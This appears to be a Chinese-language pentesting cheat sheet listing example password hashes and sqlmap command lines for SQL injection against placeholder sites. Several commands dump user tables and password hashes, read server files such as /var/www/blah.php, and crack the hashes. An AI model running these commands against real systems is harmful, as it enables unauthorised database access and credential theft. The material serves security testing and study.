哈希示例

可能只是使用哈希标识符,但这里有一些示例散列:

哈希
MD5哈希示例 8743b52063cd84097a65d1633f5c74f5
MD5 $ PASS:$ SALT示例 01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $ SALT:$ PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1哈希示例 b89eaac7e61417341b710b727768294d0e6a277b
SHA1 $ PASS:$ SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $ SALT:$ PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256 127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935
SHA-256 $ PASS:$ SALT c73d08de890479518ed60cf670d17faa26a4a7
1f995c1dcc978165399401a6c4
SHA-256 $ SALT:$ PASS eb368a2dfd38b405f014118c7d9747fcc97f4
f0ee75c05963cd9da6ee65ef498:560407001617
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f
SHA-512 $ PASS:$ SALT e5c3ede3e49fb86592fb03f471c35ba13e8
d89b8ab65142c9a8fdafb635fa2223c24e5
558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd
SHA-512 $ SALT:$ PASS 976b451818634a1e2acba682da3fd6ef
a72adf8a7a08d7939550c244b237c72c7d4236754
4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a
NTLM哈希示例 b4b9b02e6f09a9bd760f388b67351e2b

SQLMap示例

命令 描述
sqlmap -u http://meh.com --forms --batch --crawl=10
--cookie=jsessionid=54321 --level=5 --risk=3
自动sqlmap扫描
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
--file-read="/var/www/blah.php"
目标sqlmap扫描
sqlmap -u "http://meh.com/meh.php?id=1"
--dbms=mysql --tech=U --random-agent --dump
扫描url for union +基于错误的注入与mysql后端
并使用随机用户代理+数据库转储
sqlmap -o -u "http://meh.com/form/" --forms 用于注入的sqlmap检查表单
sqlmap -o -u "http://meh/vuln-form" --forms
-D database-name -T users --dump
数据库名称上的表用户的sqlmap转储和破解散列。
文 / Aex
LEAVE A REPLY
loading